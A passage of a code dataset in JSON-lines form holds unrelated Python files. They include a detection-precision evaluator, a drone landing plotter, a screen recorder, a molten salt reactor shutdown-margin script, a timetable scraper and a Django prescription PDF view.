\"\\n\")\r\n\r\n#==============================================\r\n# 検知、未検知、過検知チェック\r\n#==============================================\r\ndef check_detect(label_data, result_data):\r\n for label in label_data[\"data\"]:\r\n for result in result_data[\"data\"]:\r\n # 違うファイルの場合は無視\r\n if result[\"filename\"] != label[\"filename\"]:\r\n continue\r\n # 検知結果が『_others』(正常)の場合は無視\r\n if result[\"label\"] == \"_others\":\r\n continue\r\n # マーキング座標をチェック\r\n for point in label[\"points\"]:\r\n # マーキング座標が結果矩形の内側かチェック\r\n if result[\"point\"][\"x\"] <= point[\"x\"] <= result[\"point\"][\"x\"] + result[\"width\"] and result[\"point\"][\"y\"] <= point[\"y\"] <= result[\"point\"][\"y\"] + result[\"height\"]:\r\n # 結果矩形の内側の場合はその座標の検知フラグを立てる\r\n point[\"detect\"] = True\r\n # 結果矩形の個所の過検知フラグを下げる(どこかのマーキング座標が内側にある場合は少なくとも過検知ではない)\r\n result[\"missdetect\"] = False\r\n \r\n # マーキング座標がない場合の対応\r\n if len(label[\"points\"]) == 0:\r\n # 結果ファイル内に含まれていれば、未検知フラグを下げる\r\n label[\"undetect\"] = False\r\n continue\r\n \r\n # マーキング座標の検知数を数える\r\n detect_point = 0\r\n for point in label[\"points\"]:\r\n if point[\"detect\"]:\r\n detect_point = detect_point + 1\r\n # どこかの座標が検知されていれば、未検知フラグを下げる\r\n if detect_point >= 1:\r\n label[\"undetect\"] = False # 未検知フラグを下げる\r\n return label_data, result_data\r\n\r\n#==============================================\r\n# 検知数、未検知数、過検知数を数える\r\n#==============================================\r\ndef calc_precision(label_data, result_data):\r\n true_detect_num = 0 # 検知成功数\r\n undetect_num = 0 # 未検知数\r\n missdetect_num = 0 # 過検知数\r\n \r\n image_list = [] # 評価画像を格納\r\n undetect_images = [] # 未検知画像を格納\r\n missdetect_images = [] # 過検知画像を格納\r\n \r\n # 過検知数を数える\r\n for label in label_data[\"data\"]:\r\n # 未検知フラグをチェック\r\n if label[\"undetect\"]:\r\n undetect_num = undetect_num + 1\r\n if label[\"filename\"] not in undetect_images:\r\n undetect_images.append(label[\"filename\"])\r\n else:\r\n true_detect_num = true_detect_num + 1\r\n # 過検知数を数える\r\n for result in result_data[\"data\"]:\r\n # 過検知フラグをチェック\r\n if 
result[\"missdetect\"]:\r\n missdetect_num = missdetect_num + 1\r\n if result[\"filename\"] not in missdetect_images:\r\n missdetect_images.append(result[\"filename\"])\r\n # 評価画像数チェックのため\r\n if result[\"filename\"] not in image_list:\r\n image_list.append(result[\"filename\"])\r\n \r\n return true_detect_num, undetect_num, missdetect_num, image_list, undetect_images, missdetect_images\r\n\r\n#==============================================\r\n# メイン関数\r\n#==============================================\r\ndef main():\r\n parsed = init_args()\r\n \r\n # ラベルファイル読み込み\r\n label_file = parsed.label_file.strip()\r\n label_data = io_label.readLabelFile(label_file)\r\n # 結果ファイル読み込み\r\n result_file = parsed.result_file.strip()\r\n result_data = io_result.readResultFile(result_file)\r\n # 出力先フォルダ\r\n output_dir = parsed.output_dir.strip()\r\n os.makedirs(output_dir, exist_ok = True)\r\n \r\n # ---検知、未検知、過検知チェック---\r\n label_data, result_data = check_detect(label_data, result_data)\r\n # ---検知数、未検知数、過検知数を数える---\r\n true_detect_num, undetect_num, missdetect_num, image_list, undetect_images, missdetect_images = calc_precision(label_data, result_data)\r\n # マーキング数\r\n label_num = len(label_data[\"data\"])\r\n # 画像数を計算\r\n image_num = len(image_list)\r\n undetect_image_num = len(undetect_images)\r\n missdetect_image_num = len(missdetect_images)\r\n \r\n # ---ファイル出力---\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[0], \"w\", \"utf-8\")\r\n # 画像単位\r\n writeLine(fp, \"検知成功率(Image) {:>7.2%} ({}/{})\".format(((image_num - undetect_image_num) / image_num), (image_num - undetect_image_num), image_num))\r\n writeLine(fp, \"未検知率(Image) {:>7.2%} ({}/{})\".format((undetect_image_num / image_num), undetect_image_num, image_num))\r\n writeLine(fp, \"過検知率(Image) {:>7.2%} ({}/{})\".format((missdetect_image_num / image_num), missdetect_image_num, image_num))\r\n # マーキング単位\r\n if label_num != 0:\r\n writeLine(fp, \"検知成功率(Marking) {:>7.2%} ({}/{})\".format((true_detect_num / label_num), true_detect_num, label_num))\r\n writeLine(fp, \"未検知率(Marking) {:>7.2%} ({}/{})\".format((undetect_num / label_num), undetect_num, label_num))\r\n fp.close()\r\n \r\n # 未検知画像リストの出力\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[1], \"w\", \"utf-8\")\r\n for data in undetect_images:\r\n writeLine(fp, data)\r\n fp.close()\r\n \r\n # 過検知画像リストの出力\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[2], \"w\", \"utf-8\")\r\n for data in missdetect_images:\r\n writeLine(fp, data)\r\n fp.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n","sub_path":"CooperationBase/RapidLearningServerProgram/calcPrecision.py","file_name":"calcPrecision.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568535170","text":"import pandas\nimport matplotlib.pyplot as plt\nimport glob\nimport numpy\n\n# for plotting whycon.png\nfrom pylab import *\nfrom matplotlib.cbook import get_sample_data\nfrom matplotlib._png import read_png\n\n# get all logs\nlog_directory = \"/home/joshua/Documents/radial_land_testing (initial)/*.csv\"\nfilenames = glob.glob(log_directory)\n\nprint(filenames)\n\n# create 3d plot\nfigure = plt.figure(figsize=(15, 11))\naxes = figure.gca(projection=\"3d\")\n\n# plot landing pad\n# whycon_png = get_sample_data(\"/home/joshua/Pictures/whycon.png\", asfileobj=True)\n# img = read_png(whycon_png)\n# x, y = ogrid[0:img.shape[0], 0:img.shape[1]]\n# axes.plot_surface(x, y, 0, rstride=5, cstride=5, 
facecolors=img)\n\nfn = get_sample_data(\"/home/joshua/Pictures/whycon.png\", asfileobj=True)\nimg = read_png(fn)\nx, y = ogrid[0:img.shape[1], 0:img.shape[0]]\n\nx = x.astype(float) / 225.0 - 0.5\ny = y.astype(float) / 225.0 - 0.5\n\n# ax = gca(projection='3d')\naxes.plot_surface(x, y, 0, rstride=5, cstride=5, facecolors=img)\n\ncolors = [\"black\", \"purple\", \"blue\", \"green\", \"yellow\", \"red\"]\n\ntimes = []\nenergies = []\ndescent_edges = []\n\nfor filename in filenames:\n # import flight data\n flight_data = pandas.read_csv(filename)\n\n # get only useful trajectories\n # landing_trajectory = flight_data.where((flight_data[\"whycon_detected\"] == 1) or (flight_data[\"apriltag_detected\"] == 1))\n # landing_trajectory = flight_data.query(\"whycon_detected == 1 | apriltag_detected == 1\")\n landing_trajectory = flight_data.query(\"landing_phase != 5\")\n\n # print(landing_trajectory.head())\n\n axes.plot(landing_trajectory[\"landing_pad_position_y\"] - landing_trajectory[\"iris_position_y\"],\n landing_trajectory[\"landing_pad_position_x\"] - landing_trajectory[\"iris_position_x\"],\n landing_trajectory[\"iris_position_z\"] - landing_trajectory[\"landing_pad_position_z\"])\n\n times.append(landing_trajectory.time.iloc[-1] - landing_trajectory.time.iloc[0])\n energies.append(landing_trajectory.energy_consumed.iloc[-1] - landing_trajectory.energy_consumed.iloc[0])\n\n # for i in range(5):\n #\n # segment = landing_trajectory.query(\"landing_phase != %s\" % 5)\n # # plot 3d trajectory\n # axes.plot(segment[\"landing_pad_position_x\"] - segment[\"iris_position_y\"], segment[\"landing_pad_position_y\"] - segment[\"iris_position_x\"], segment[\"iris_position_z\"] - segment[\"landing_pad_position_z\"], color = colors[i])\n\n # if( i == 4 ):\n # start_time = segment.iloc[0].time\n # # print(segment.head())\n # elif( i == 0 ):\n # end_time = segment.iloc[0].time\n\n axes.view_init(elev=30, azim=40)\n axes.set_xlabel(\"East\")\n axes.set_ylabel(\"North\")\n axes.set_zlabel(\"Up\")\n\n axes.set_xlim3d(-20, 20)\n axes.set_ylim3d(-20, 20)\n\n# plt.savefig(\"/home/joshua/Documents/radial_land_testing/figure.png\", bbox_inches=\"tight\", pad_inches=-0.2, transparent=True)\n# plt.show()\n\nprint(numpy.mean(times), numpy.std(times))\nprint(numpy.mean(energies), numpy.std(energies))","sub_path":"visualize_radial_landings.py","file_name":"visualize_radial_landings.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157721965","text":"#! 
/usr/bin/python3\n# coding=utf-8\n\"\"\"\nscreen.py\n\nAuthor: wenbao\nDescription: my screen recorder\n\"\"\"\nimport cv2\nimport datetime\nimport numpy as np\nimport threading\n\nfrom PIL import ImageGrab\nfrom tkinter import Button\nfrom tkinter import Frame\nfrom tkinter import Tk\n\n\nflag = None  # stop flag\n\n\ndef video_record():\n    \"\"\"Record the screen.\n    \"\"\"\n    print('Recording started!')\n    date = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')  # current time\n    p = ImageGrab.grab()  # grab the current screen\n    a, b = p.size  # size of the current screen\n    fourcc = cv2.VideoWriter_fourcc(*'XVID')  # codec\n    filename = '{}.avi'.format(date)\n    fps = 20  # 24\n    # cv2.VideoWriter(filename, fourcc, fps, frameSize, isColor)\n    # filename: path of the file to save\n    # fourcc: which encoder to use\n    # fps: frame rate of the saved video\n    # frameSize: frame size of the saved file\n    # isColor: whether the frames are color or grayscale\n    video = cv2.VideoWriter(filename=filename, fourcc=fourcc,\n                            fps=fps, frameSize=(a, b))\n    while True:\n        im = ImageGrab.grab()\n        imm = cv2.cvtColor(np.array(im), cv2.COLOR_RGB2BGR)  # convert to OpenCV's BGR format\n        video.write(imm)\n        if not flag:\n            print(\"Recording finished!\")\n            break\n    video.release()\n\n\nclass Application(Frame):\n    def __init__(self, master=None):\n        Frame.__init__(self, master=master, height=2, bd=1, relief=\"groove\")\n        self.pack()\n        self.createWidgets()\n\n    def createWidgets(self):\n        self.start = Button(self, text='start', fg='black',\n                            bg='white', command=self.start)\n        self.start.pack(side='left')\n\n        self.stop = Button(self, text='stop', fg='black',\n                           bg='white', command=self.stop, state='disabled')\n        self.stop.pack(side='right')\n\n    def start(self):\n        self.start['state'] = 'disabled'\n        self.stop['state'] = 'normal'\n        global flag\n        flag = True\n        self.th = threading.Thread(target=video_record)\n        self.th.start()\n\n    def stop(self):\n        self.start['state'] = 'normal'\n        self.stop['state'] = 'disabled'\n        global flag\n        flag = False\n\n\ndef main():\n    try:\n        root = Tk()  # create the top-level window\n        root.minsize(180, 30)  # minimum size\n        root.maxsize(180, 30)  # maximum size\n        root.resizable(0, 0)\n        root.attributes('-topmost', True, '-alpha', 0.95)\n        # root.attributes(\n        #     '-notify', False,\n        #     '-modified', False,\n        #     '-alpha', 0.95,\n        #     '-fullscreen', False,\n        #     '-topmost', True)\n\n        app = Application(master=root)\n        # set the window title:\n        app.master.title('wenbao recorder')\n        # main event loop:\n        app.mainloop()\n    except Exception as err:\n        raise\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"screen_mac_win/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2670176","text":"#!/usr/bin/python3\n#\n# Script to test for blanket drain criticality safety and shutdown margin\n#\n# Ondrej Chvala, ochvala@utk.edu\n\nfrom ornl4528core import CoreGen\nimport time\n\n# Core parameters\nhpitch:float = 6.045\nr1:float = 2.550\nr2:float = 3.758\nr3:float = 4.534\nl4:float = 5.697\ntempC:float = 700.\nrgr_scale:float = 0.90\nrfuel:float = 200.0\nrcore:float = 230.0\nzcore:float = 400.0\nrefl_ht:float = 100.0\nn_deckname:str = 'ORNL-4528 deck for the normal core'\ns_deckname:str = 'ORNL-4528 deck for the scrammed core'\nd_deckname:str = 'ORNL-4528 deck for the core with a drained blanket'\nt_deckname:str = 'ORNL-4528 deck for the scrammed/stopped core with no flow'\n\n# Define control rod positions and states\nicr:int = 8 # This position gets the largest reactivity effects\ncontrol_rods = [(0,0), (icr,-icr), (icr,0), (0,icr), (-icr,0), (0,-icr), (-icr,icr)]\nn_crod_state = [ 0, 0, 0, 0, 0, 0, 0 ] # All rods out\ns_crod_state = [ 1, 1, 1, 1, 1, 1, 1 ] # All control
clusters in\nd_crod_state = [ 2, 2, 2, 2, 2, 2, 2 ] # All floating rods in\nt_crod_state = [ 3, 3, 3, 3, 3, 3, 3 ] # All rods in\n\n# Create ORNL-4528 cores\nnormal_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, n_deckname)\nscrammed_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, s_deckname)\ndrained_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, d_deckname)\nstopped_core = CoreGen(hpitch, r1, r2, r3, l4, \\\n tempC, rgr_scale, rfuel, rcore, zcore, refl_ht, t_deckname)\n\n# List of my cores\nmy_cores = [ normal_core, scrammed_core, drained_core, stopped_core]\n\n# Assign control rod lattice positions, make sure to make geometry and mesh plots\nfor c in my_cores:\n c.geomplots = True\n c.meshplots = True\n c.control_rods = control_rods\n\n# Assign control rod states\nnormal_core.crod_state = n_crod_state\nscrammed_core.crod_state = s_crod_state\ndrained_core.crod_state = d_crod_state\nstopped_core.crod_state = t_crod_state\n\n# Set sub-directories to run each case\nnormal_core.deck_path = './00_normal'\nscrammed_core.deck_path = './01_scrammed'\ndrained_core.deck_path = './02_drained'\nstopped_core.deck_path = './03_stopped'\n\n# Drain the drained core\ndrained_core.blanket_drained = True\n\n# Build all cores and save input decks\nfor c in my_cores:\n c.save_deck()\n\n# Run all cases\nfor c in my_cores:\n if not c.get_calculated_values():\n c.run_deck()\n\n# Wait for Serpent jobs and get results\ncores_done:int = 0\nwhile cores_done < len(my_cores):\n cores_done = 0\n for c in my_cores:\n if(c.k < 0.0):\n if c.get_calculated_values():\n cores_done += 1\n print(\"[DEBUG] Got results for \", c.deck_path)\n else: # Core already read in\n cores_done += 1\n if cores_done < len(my_cores):\n print(\"[DEBUG] \", cores_done, \" done, sleeping ...\")\n time.sleep(20) # Wait a minute for Serpent ...\n\n# Calculate reactivities [pcm]\nrho_n:float = 1e5*( normal_core.k - 1.0) / normal_core.k\nrho_d:float = 1e5*( drained_core.k - 1.0) / drained_core.k\nrho_s:float = 1e5*( scrammed_core.k - 1.0) / scrammed_core.k\nrho_t:float = 1e5*( stopped_core.k - 1.0) / stopped_core.k\n\n# Print results\nprint(\"\\nReactivity [pcm] for the studied cases\")\nprint(\"normal : %8.1f \" % rho_n)\nprint(\"drained : %8.1f \" % rho_d)\nprint(\"scrammed : %8.1f \" % rho_s)\nprint(\"stopped : %8.1f \" % rho_t)\n\nprint(\"\\nReactivity difference [pcm] from normal condition\")\nprint(\"drained : %8.1f \" % (rho_d-rho_n))\nprint(\"scrammed : %8.1f \" % (rho_s-rho_n))\nprint(\"stopped : %8.1f \" % (rho_t-rho_n))\n\n\n\n''' *** Results for different CR absorber choices ***\n--- Enriched B4C ---\nReactivity [pcm] for the studied cases\nnormal : 2927.7 \ndrained : 41704.2 \nscrammed : -5175.4 \nstopped : -5573.0 \n\nReactivity difference [pcm] from normal condition\ndrained : 38776.5 \nscrammed : -8103.1 \nstopped : -8500.7 \n\n--- Natural B4C ---\nReactivity [pcm] for the studied cases\n\nReactivity difference [pcm] from normal condition\n\n--- Boron metal ---\nReactivity [pcm] for the studied cases\n\nReactivity difference [pcm] from normal condition\n\n'''\n","sub_path":"scripts/core-writer-4528-master/core/blanketdrain4528.py","file_name":"blanketdrain4528.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279466369","text":"import csv\nimport pandas\n\n##input csv\n##[identifier, wild(1), mut(1), 
Chothia_Num]\n\n\ndef getAPSSMscore(input_csv):\n\n    APSSM = pandas.read_csv('/home/ymyung/PycharmProjects/selfstudy/PYTHON/resource/new_APSSM.csv', header=0, quotechar='\\'')\n\n    dic = {}\n    result = []\n\n    for each in range(0,20):\n\n        dic[APSSM['position'][each]] = each\n\n    with open(input_csv,'r') as inputfile:\n        cv = csv.reader(inputfile)\n\n        next(cv)\n\n        for each in cv:\n            identifier = each[0]\n            wild = each[1]\n            mut = each[2]\n            chothia = each[3]\n\n            if chothia.startswith('H') or chothia.startswith('L'):\n                num = chothia.split('_')[1]\n                temp = \"\".join(chothia.split('_'))\n                # print(num)\n                # print(temp)\n                wild_APSSM_score = APSSM[temp][dic[wild]]\n                mut_APSSM_score = APSSM[temp][dic[mut]]\n                d_APSSM_score = round((mut_APSSM_score - wild_APSSM_score),3)\n                # print(mat[temp][dic[wild]])\n                # print(mat[temp][dic[mut]])\n                # print(wild, mut,temp,wild_APSSM_score,mut_APSSM_score,d_APSSM_score )\n                # print(d_APSSM_score )\n                result.append([identifier,d_APSSM_score])\n\n            elif not chothia.startswith(\"Chothia\"):\n                # print(\"0\")\n                result.append([identifier,\"?\"])\n    return result\n\n\n\n# for test\n# input_csv='/home/ymyung/Desktop/180512_unique_PROXiMATE.csv'\n# for each in (getAPSSMscore(input_csv)):\n#     print(each)","sub_path":"PYTHON/new_attr/APSSM.py","file_name":"APSSM.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414236453","text":"# coding: utf-8\n# Change the type of exception, part 2\n\nimport sys\n\nenemies = [\"Slime\", \"Dragon\", \"Demon King\"]\n\ntry:\n    number1 = 0\n    print(\"The hero encountered an enemy\")\n    print(\"The hero fought the \" + enemies[number2])\nexcept ZeroDivisionError as e:\n    sys.stderr.write(\"That enemy cannot be displayed\")\nexcept NameError as e:\n    sys.stderr.write(\"An undefined variable is being referenced\")\n\nfinally:\n    print(\"The hero was victorious\")\n","sub_path":"paiza/paiza_10/paiza_10_005_001.py","file_name":"paiza_10_005_001.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"221552315","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3.
See license.txt\n\nfrom __future__ import unicode_literals\n\nimport frappe, verp\nfrom frappe.utils import flt\nfrom frappe.utils.make_random import get_random\nfrom verp.projects.doctype.timesheet.test_timesheet import make_timesheet\nfrom verp.demo.user.hr import make_sales_invoice_for_timesheet\n\ndef run_projects(current_date):\n\tfrappe.set_user(frappe.db.get_global('demo_projects_user'))\n\tif frappe.db.get_global('demo_projects_user'):\n\t\tmake_project(current_date)\n\t\tmake_timesheet_for_projects(current_date)\n\t\tclose_tasks(current_date)\n\ndef make_timesheet_for_projects(current_date\t):\n\tfor data in frappe.get_all(\"Task\", [\"name\", \"project\"], {\"status\": \"Open\", \"exp_end_date\": (\"<\", current_date)}):\n\t\temployee = get_random(\"Employee\")\n\t\tts = make_timesheet(employee, simulate = True, billable = 1, company = verp.get_default_company(),\n\t\t\tactivity_type=get_random(\"Activity Type\"), project=data.project, task =data.name)\n\n\t\tif flt(ts.total_billable_amount) > 0.0:\n\t\t\tmake_sales_invoice_for_timesheet(ts.name)\n\t\t\tfrappe.db.commit()\n\ndef close_tasks(current_date):\n\tfor task in frappe.get_all(\"Task\", [\"name\"], {\"status\": \"Open\", \"exp_end_date\": (\"<\", current_date)}):\n\t\ttask = frappe.get_doc(\"Task\", task.name)\n\t\ttask.status = \"Completed\"\n\t\ttask.save()\n\ndef make_project(current_date):\n\tif not frappe.db.exists('Project',\n\t\t\"New Product Development \" + current_date.strftime(\"%Y-%m-%d\")):\n\t\tproject = frappe.get_doc({\n\t\t\t\"doctype\": \"Project\",\n\t\t\t\"project_name\": \"New Product Development \" + current_date.strftime(\"%Y-%m-%d\"),\n\t\t})\n\t\tproject.insert()\n","sub_path":"verp/demo/user/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152796633","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\n\n\nclass Parser:\n def __init__(self):\n self.timetable = {\n 'week_1': {\n 'monday': [],\n 'tuesday': [],\n 'wednesday': [],\n 'thursday': [],\n 'friday': [],\n 'saturday': [],\n },\n 'week_2': {\n 'monday': [],\n 'tuesday': [],\n 'wednesday': [],\n 'thursday': [],\n 'friday': [],\n 'saturday': [],\n }\n }\n\n def get_int_subgroup(self, string):\n for symbol in string:\n if symbol.isdigit():\n return int(symbol)\n\n def parse_type_of_subject(self, name_subject):\n type_subject = name_subject[ name_subject.find('(') + 1 : name_subject.find(')') ]\n if type_subject not in ['Лекция', 'Практика', 'Лабораторная работа']:\n name_subject = name_subject.replace(f'({type_subject})', '')\n return name_subject[ name_subject.find('(') + 1 : name_subject.find(')') ]\n\n def parse_cabinet(self, cabinet):\n cabinet = cabinet.replace('корп. ', '')\n cabinet = cabinet.replace(' каб. 
', '-')\n cabinet = cabinet.replace('\"', '')\n return cabinet\n\n def get_time(self, line):\n return re.sub(r\"\\s\", \"\", line.find('div', {'class': 'hidden-xs'}).text)\n\n def get_subjects(self, line):\n div_row = line.find('div', {'class': 'row'})\n return div_row.find_all('div')\n\n def get_name_subjects(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n name = sub_subject.find('span', {'class': 'name'}).text\n result.append(name)\n return result\n\n def get_type_subjects(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n type_subject = self.parse_type_of_subject(sub_subject.find('span', {'class': 'name'}).parent.text )\n result.append(type_subject)\n return result\n\n def get_teachers(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(sub_subject.find('a').text)\n return result\n\n def get_location_in_university(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(self.parse_cabinet(sub_subject.find('a', {'href': '#'}).text))\n return result\n\n def get_location_in_city(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n result.append(sub_subject.find('a', {'href': '#'})['title'])\n return result\n\n def get_subgroups(self, line):\n result = []\n for sub_subject in self.get_subjects(line):\n subgroup = None\n if sub_subject.find('i', {'class': 'fa-paperclip'}) is not None:\n subgroup = self.get_int_subgroup(sub_subject.find_all('li')[-1].text)\n \n if sub_subject.find('li', {'class': 'num_pdgrp'}) is not None:\n subgroup = self.get_int_subgroup(sub_subject.find('li', {'class': 'num_pdgrp'}).text)\n \n result.append(subgroup)\n return result\n\n def get_day_timetable(self, numb_week, day, id):\n response = requests.get(\n f'https://timetable.pallada.sibsau.ru/timetable/group/{id}'\n ).text\n soup = BeautifulSoup(response, 'html.parser')\n return soup.select(f'#week_{numb_week}_tab > div.day.{day} > div.body')\n\n def is_weekend(self, day_timetable):\n return len(day_timetable) == 0\n\n def get_timetable(self, id):\n for numb_week in range(1, 3):\n days = self.timetable[f'week_{numb_week}']\n for day in days:\n day_timetable = self.get_day_timetable(numb_week, day, id)\n if self.is_weekend(day_timetable):\n days[day].append({'weekend': 'Отдыхайте'})\n continue\n\n for line in day_timetable[0].find_all('div', {'class': 'line'}):\n days[day].append({\n 'time': self.get_time(line),\n 'name_subjects': self.get_name_subjects(line),\n 'type_subjects': self.get_type_subjects(line),\n 'teachers': self.get_teachers(line),\n 'subgroups': self.get_subgroups(line),\n 'location_in_university': self.get_location_in_university(line),\n 'location_in_city': self.get_location_in_city(line)\n })\n\n return self.timetable\n","sub_path":"timetable_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500021909","text":"from io import BytesIO\n\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom reportlab.lib.colors import (\n brown,\n white\n)\nfrom reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib.styles import ParagraphStyle\nfrom reportlab.platypus import (\n Paragraph,\n Table,\n TableStyle\n)\nfrom reportlab.platypus import SimpleDocTemplate\nfrom rest_framework import viewsets, status\nfrom 
rest_framework.response import Response\n\nfrom articulo.serializers import *\n\n\ndef recetas(request):\n return render_to_response('recetas.html')\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass DoctorViewSet(viewsets.ModelViewSet):\n queryset = Doctor.objects.all()\n serializer_class = DoctorSerializer\n\n\nclass ClienteViewSet(viewsets.ModelViewSet):\n queryset = Cliente.objects.all()\n serializer_class = ClienteSerializer\n\nclass RecetaViewSet(viewsets.ModelViewSet):\n queryset = Receta.objects.all()\n serializer_class = RecetaSerializer\n\n def list(self, request, **kwargs):\n try:\n\n recetas = query_recetas_by_args(**request.query_params)\n serializer = RecetaSerializer(recetas['items'], context={'request': request}, many=True)\n result = dict()\n result['data'] = serializer.data\n result['draw'] = recetas['draw']\n result['recordsTotal'] = recetas['total']\n result['recordsFiltered'] = recetas['count']\n\n return Response(result, status=status.HTTP_200_OK, template_name=None, content_type=None)\n\n except Exception as e:\n return Response(e, status=status.HTTP_404_NOT_FOUND, template_name=None, content_type=None)\n\n\ndef pdf_receta(request):\n response = HttpResponse(content_type='application/pdf')\n id = request.GET['id']\n receta = Receta.objects.get(pk=id)\n pdf_name = \"receta \" + str(receta.numero) + \".pdf\"\n response['Content-Disposition'] = 'attachment; filename=%s' % pdf_name\n buffer = BytesIO()\n doc = SimpleDocTemplate(buffer,\n pagesize=letter,\n rightMargin=40,\n leftMargin=40,\n topMargin=60,\n bottomMargin=18,\n )\n # table header\n content = []\n styles = stylesheet()\n tb_fecha = [\n [Paragraph(\"FECHA\", styles['default']),\n Paragraph(str(receta.fecha.day), styles['default']),\n Paragraph(str(receta.fecha.month), styles['center']),\n Paragraph(str(receta.fecha.year), styles['rigth'])],\n [Paragraph(\"RETIRA\", styles['default']),\n Paragraph(\" \", styles['default']),\n Paragraph(\" \", styles['center']),\n Paragraph(\" \", styles['rigth'])]\n ]\n tb = Table(tb_fecha)\n tb.setStyle(TableStyle(\n [\n ('GRID', (1, 0), (3, -1), 1, brown),\n ('BACKGROUND', (0, 0), (-1, 0), None)\n ]\n ))\n # banner = Image('../../venta/static/images/banner.png')\n tbl_data = [\n [Paragraph(\"Opticas Alemanas(LOGO)\", styles['default']),\n Paragraph(\"Orden de trabajo\", styles['title']),\n Paragraph(\" \", styles['default'])\n ],\n [Paragraph(\" \", styles['default']),\n Paragraph(str(receta.numero), styles['title'])],\n [Paragraph(\" \", styles['default']),\n Paragraph(\" \", styles['title']),\n tb]\n ]\n tb_header = Table(tbl_data)\n content.append(tb_header)\n pedido = Paragraph(\"Pedido a: \", styles['default'])\n content.append(pedido)\n cliente = Paragraph(\"Señor: \" + receta.cliente.usuario.first_name + \" \" + receta.cliente.usuario.last_name,\n styles['default'])\n content.append(cliente)\n direccion = Paragraph(\"Domicilio: \", styles['default'])\n content.append(direccion)\n tbl_data = [\n [Paragraph(\"Tel: \" + receta.cliente.telefono, styles['default']),\n Paragraph(\"CI: \" + receta.cliente.CI, styles['center']),\n Paragraph(\"E-mail: \" + receta.cliente.usuario.email, styles['rigth'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n content.append(Paragraph(\"MEDICIÓN\", styles['center']))\n headings = ('', Paragraph(\"ESF.\", styles['center']), Paragraph(\"CIL\", styles['center']),\n Paragraph(\"EJE\", styles['center']), Paragraph(\"PRISMA\", styles['center']),\n 
Paragraph(\"DI.INT\", styles['center']), Paragraph(\"ALT.\", styles['center']))\n\n m_lejos_od = Medicion()\n m_lejos_oi = Medicion()\n m_cerca_od = Medicion()\n m_cerca_oi = Medicion()\n if receta.lente_cerca:\n m_lejos_od = receta.lente_cerca.cristalDer.medicion_lejos\n m_lejos_oi = receta.lente_cerca.cristalIzq.medicion_lejos\n if receta.lente_lejos:\n m_cerca_od = receta.lente_cerca.cristalDer.medicion_cerca\n m_cerca_oi = receta.lente_cerca.cristalIzq.medicion_cerca\n mediciones = [\n [Paragraph(\"Lejos OD.\", styles['rigth']), Paragraph(str(m_lejos_od.esfera), styles['center']),\n Paragraph(str(m_lejos_od.cilindro), styles['center']),\n Paragraph(str(m_lejos_od.eje)+\"º\", styles['center']),\n Paragraph(str(m_lejos_od.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_lejos_od.altura), styles['center'])\n ],\n [Paragraph(\"OI.\", styles['rigth']), Paragraph(str(m_lejos_oi.esfera), styles['center']),\n Paragraph(str(m_lejos_oi.cilindro), styles['center']),\n Paragraph(str(m_lejos_oi.eje)+\"º\", styles['center']),\n Paragraph(str(m_lejos_oi.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_lejos_oi.altura), styles['center'])\n ],\n [Paragraph(\"Cerca OD.\", styles['rigth']), Paragraph(str(m_cerca_od.esfera), styles['center']),\n Paragraph(str(m_cerca_od.cilindro), styles['center']),\n Paragraph(str(m_cerca_od.eje)+\"º\", styles['center']),\n Paragraph(str(m_cerca_od.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n Paragraph(str(m_cerca_od.altura), styles['center'])\n ],\n [Paragraph(\"OI.\", styles['rigth']), Paragraph(str(m_cerca_oi.esfera), styles['center']),\n Paragraph(str(m_cerca_oi.cilindro), styles['center']),\n Paragraph(str(m_cerca_oi.eje)+\"º\", styles['center']),\n Paragraph(str(m_cerca_oi.prisma), styles['center']),\n Paragraph(str(0), styles['center']),\n 